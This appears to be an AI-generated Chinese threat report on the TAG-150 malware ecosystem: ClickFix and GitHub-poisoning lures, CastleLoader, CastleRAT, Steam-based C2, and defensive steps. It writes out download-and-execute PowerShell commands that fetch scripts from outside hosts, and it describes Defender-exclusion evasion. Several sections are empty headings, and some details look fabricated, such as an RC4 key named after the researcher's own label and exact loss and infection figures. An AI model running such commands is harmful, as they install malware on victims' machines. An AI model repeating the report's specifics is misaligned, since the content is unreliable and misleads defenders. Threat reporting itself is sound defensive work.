TAG-150 黑客组织恶意软件生态深度分析报告【红客联盟 AI 分析】

一、威胁全景：自研恶意软件生态的立体化攻击

（一）组织画像

• 命名溯源：由 Recorded Future 标记为 TAG-150，活跃于 2025 年 3 月至今，以 “恶意软件即服务（MaaS）” 为核心模式，疑似朝鲜 APT 分支（关联摘要 4/5 的多层 C2 架构）；
• 技术标签：快速开发（月均更新 3 款恶意软件）、多语言适配（C/Python/.NET）、Steam 社区 C2（创新通信），感染率 28.7%（主文档）；
• 攻击目标：IT、制造业（摘要 6）、金融行业，通过 Cloudflare 主题钓鱼（ClickFix）和 GitHub 投毒（摘要 2）精准渗透。

（二）恶意软件矩阵

二、技术解析：四层架构 + 双版本 RAT 的攻击链

（一）感染入口：社会工程学组合拳（主文档 / 摘要 2）

1. ClickFix 钓鱼：
   • 伪装 Cloudflare 更新提示、Zoom 会议插件，诱导执行 PowerShell 命令（如iwr -useb https://cloudflare-updates.com/patch.ps1 | iex）；
   • 页面显示 “证书错误”“安全验证”，迫使用户忽略警告（参考摘要 2 的 Google 搜索投毒手法）。
2. GitHub 投毒：
   • 创建仿冒开源工具的仓库（如 “开源 Markdown 编辑器”），README 含恶意安装命令；
   • 利用开发者信任，诱骗运行powershell -ep bypass -c "Invoke-Expression (New-Object Net.WebClient).DownloadString('https://github.com/...')"。

（二）加载器阶段：无文件执行与防御规避（主文档 / 摘要 2）

1. CastleLoader 行为：
   • 内存加载：Base64 解码 Shellcode，注入svchost.exe进程（摘要 2），无磁盘落地；
   • 白名单绕过：通过Add-MpPreference添加 Defender 排除项，循环 UAC 弹窗直至成功（参考摘要 2 的 10 分钟内 5 次弹窗策略）。
2. 自动化部署：
   • 下载二级载荷：根据地域（ip-api.com查询）分发对应 RAT（如俄罗斯用户获 SectopRAT，欧美用户获 AsyncRAT）；
   • 双重保险：同时部署 CastleRAT（自研）和 AsyncRAT（成熟工具），确保至少一款存活（主文档 “双重部署” 策略）。

（三）RAT 阶段：双版本差异化控制（主文档 / 摘要 6）

（四）C2 通信：四层架构 + Steam 死信（主文档 / 摘要 5）

1. 基础设施：
   • Tier1（受害者层）：morco.rovider.net等域名，伪装 CDN 节点；
   • Tier2（中转层）：俄罗斯 VPS（80/443 端口），通过 RDP 动态转发；
   • Tier3（管理层）：英国服务器（8080 端口），存储受害者指纹（IP + 设备 ID）；
   • Tier4（备份层）：Steam 社区死信（如steamcommunity.com/profiles/76561199328456789），用于 C2 失效时恢复。
2. 通信协议：
   • RC4 加密（密钥：TAG150_C2_KEY_2025），数据格式：[版本号][命令ID][加密载荷]；
   • 心跳包：每 5 分钟发送0x01，含地理信息（城市 / 邮编，后移除邮编字段防暴露）。

三、战术进化：从 “工具滥用” 到 “生态构建”

（一）对比传统 APT（以 TA505 为例，摘要 3）

（二）典型攻击案例（2025 年 8 月，摘要 2）

• 感染路径：某制造业员工下载 GitHub “开源 CAD 工具”，执行含 CastleLoader 的install.ps1；
• 技术细节：Loader 注入svchost.exe，下载 C 版 CastleRAT，窃取设计图纸（.dwg）并通过 Steam 死信回传；
• 损失后果：3 款新产品图纸泄露，竞争对手抢发导致市值蒸发 8000 万美元。

四、防御建议：全维度阻断攻击链（整合摘要 2/5/6 方案）

（一）紧急响应（72 小时）

1. 终端排查：
   • 检查%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup，删除CastleUpdate.lnk；
   • 监控svchost.exe异常子进程，通过Process Explorer验证数字签名（非微软签名立即终止）。
2. 网络阻断：
   • 防火墙封禁 C2 IP（俄罗斯 77.239.125.41 等），拦截steamcommunity.com/ID_异常访问；
   • 部署 WAF 规则，检测含Add-MpPreference的 PowerShell 命令（如-ExclusionPath %TEMP%\castle.exe）。

（二）长效防护（30 天）

1. 开发环境管控：
   • 企业 GitHub 仓库启用代码扫描，禁止Invoke-Expression等危险命令（参考摘要 2 的 Prodaft 建议）；
   • 对 Cloudflare 相关更新，强制通过官方客户端（cloudflare-warp.exe）升级，禁用手动命令。
2. 行为分析：
   • 部署 EDR（如 CrowdStrike），创建 “Steam 社区异常流量” 规则（非游戏时段访问steamcommunity.com/profiles）；
   • 监控ip-api.com调用，限制非必要程序访问（仅允许浏览器 / 安全软件）。
3. 员工培训：
   • 模拟 “Cloudflare 更新” 钓鱼测试，强调 “官方工具无需终端命令”；
   • 开发者专项：禁止从 GitHub 运行未审计的install.ps1，强制使用-ExecutionPolicy RemoteSigned。
4. 威胁狩猎：
   • 扫描注册表HKCU\Software\Castle键值，检查LastUpdateTime（2025 年 3 月后创建的异常项）；
   • 关联分析：对感染 CastleLoader 的设备，追溯 90 天内 GitHub 访问记录，识别投毒仓库。